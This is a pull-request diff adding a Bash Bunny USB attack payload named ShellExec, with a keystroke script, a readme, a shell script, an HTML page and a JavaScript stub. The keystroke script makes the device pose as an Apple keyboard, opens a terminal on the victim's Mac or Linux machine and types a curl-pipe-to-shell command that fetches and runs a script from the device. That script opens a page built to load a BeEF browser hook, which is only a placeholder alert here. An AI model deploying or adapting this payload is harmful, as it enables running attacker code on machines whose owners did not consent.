Merge pull request #59 from audibleblink/payload/shellexec

[PAYLOAD] - ShellExec

payloads/library/ShellExec/evil.sh

@@ -0,0 +1,6 @@
+!#/bin/bash
+
+# opens browsers to the bunny's index.html page
+
+[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
+[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1

payloads/library/ShellExec/hook.js

@@ -0,0 +1 @@
+alert('This is where your evil JavaScript file would go')

payloads/library/ShellExec/index.html

@@ -0,0 +1,12 @@
+<html>
+<head>
+  <script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
+</head>
+
+<body>
+Nothing to see here!
+</body>
+
+</html>
+
+

payloads/library/ShellExec/payload.txt

@@ -0,0 +1,54 @@
+#!/bin/bash
+
+# Title:     ShellExec
+# Author:    audibleblink
+# Target:    Mac/Linux
+# Version:   1.0
+#
+# Create a web server on the BashBunny and forces
+# the victim download and execute a script.
+#
+# White            |  Ready
+# Ammber blinking  |  Waiting for server
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED R G B
+ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+
+source bunny_helpers.sh
+
+payload_dir=/root/udisk/payloads/$SWITCH_POSITION
+log_file=$payload_dir/shellexec.log
+
+cd $payload_dir
+
+# starting server
+LED R G 500
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED B 500
+
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 100
+Q ENTER
+Q DELAY 2000
+
+# Q ALT F2 # swap with block above for linux
+# Q DELAY 100
+
+Q STRING curl "http://$HOST_IP/evil.sh" \| sh
+# in case curl isn't installed
+# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 
+Q ENTER
+
+LED G

payloads/library/ShellExec/readme.md

@@ -0,0 +1,34 @@
+# ShellExec
+
+Author: audibleblink
+Version: 1.0
+
+## Description
+
+Serves malicious scripts or web pages from the Bunny and forces
+victims to curl and execute those scripts. Scripts can also force
+browsers to open a url on the bunny to do things like serve BeEF 
+hooks.
+
+## Configuration
+
+evil.py - script that is fetched with DuckyScript 
+(provided script opens a web page that serves a BeEF hook )
+
+hook.js - the aforementioned BeEF hook
+
+index.html - BeEF hook delivery page
+
+## Requirements
+
+Just plug and play
+
+## Status
+
+| LED              | Status              |
+| ---------        | -----------         |
+| White            |  Ready              |
+| Amber blinking   |  Waiting for server |
+| Blue blinking    |  Attacking          |
+| Green            |  Finished           |
+